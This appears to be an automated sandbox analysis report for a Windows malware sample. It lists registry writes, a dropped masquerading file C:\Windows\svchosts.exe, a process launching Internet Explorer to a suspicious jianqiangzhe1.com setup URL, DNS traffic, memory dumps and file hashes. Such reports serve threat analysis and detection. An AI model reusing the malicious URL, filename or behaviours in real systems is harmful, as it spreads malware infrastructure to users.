Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{E7C6A987-8C29-11EF-ADF2-EE81E66BE9E9} = "0" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 100fa4bd3620db01 C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137846" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\progra~1\Intern~1\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 20e39cbd3620db01 C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\VersionManager C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31137846" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\progra~1\Intern~1\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\progra~1\Intern~1\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3164306885" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "31137846" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "3157744368" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000a43d217a0cb97a4db769f976d8642e39000000000200000000001066000000010000200000006663c5dc132f6a8a14f66db290ab6f9485b3bf692775244e8dc50f2ae5d0e831000000000e800000000200002000000065619fdce6566372f8eac5ce1dfb004939679bea1d3737b0b9b47c161b6485b220000000b0d39a26ce4c8538f383ca83d1d5c13ade51c0d5fb826a170cc80383c848a1e3400000006eb328adb52ab15a3873cbeb62e3aa04fe568cc464cca9aa0d7b663de3f8cac64d543a775e9b19cc730f9ad17919b367f962a7d54387ee8161fb0eecdde4da34 C:\progra~1\Intern~1\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "435894683" C:\progra~1\Intern~1\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\progra~1\Intern~1\iexplore.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\progra~1\Intern~1\iexplore.exe N/A
N/A N/A C:\windows\svchosts.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe

"C:\Users\Admin\AppData\Local\Temp\d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80.exe"

C:\windows\svchosts.exe

C:\windows\svchosts.exe auto

C:\progra~1\Intern~1\iexplore.exe

C:\\progra~1\\Intern~1\\iexplore.exe http://jianqiangzhe1.com/AddSetup.asp?id=137&localID=232138804165&isqq=3

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2032 CREDAT:17410 /prefetch:2

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 jianqiangzhe1.com udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 ip213.com udp
US 8.8.8.8:53 jianqiangzhe1.com udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 161.19.199.152.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp

Files

memory/3408-0-0x0000000000400000-0x0000000000431000-memory.dmp

memory/3408-1-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Windows\svchosts.exe

MD5 43c6fd6fc51136632b47a8672de41034
SHA1 a22897d94f9d1ef123cbb1e372a619113327c214
SHA256 d3b12c1d1dfa2df176c207781470303a234174fcb350cefa8ca11887d91f7a80
SHA512 f64b041b5a6afb4412496b526be0059814e4aac587764b36aa5b553ebe9d92533a162f484adc4b705853d65f59f262a91ad8888b84f6c1b7ac1099725fdd4e6a

memory/2544-9-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2032-12-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-13-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-15-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-18-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-17-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-16-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-20-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-23-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-22-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-30-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-36-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-34-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-33-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-42-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-43-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-41-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-40-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-45-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-51-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-52-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-53-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-50-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-46-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-44-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-39-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-38-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-31-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-54-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-59-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-29-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-28-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-26-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-24-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-21-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-19-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-64-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-61-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-66-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-63-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-62-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-60-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/3408-67-0x0000000000400000-0x0000000000431000-memory.dmp

memory/2032-74-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2032-79-0x00007FFCD74F0000-0x00007FFCD755E000-memory.dmp

memory/2544-94-0x0000000000400000-0x0000000000431000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\TRPPE7V2\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee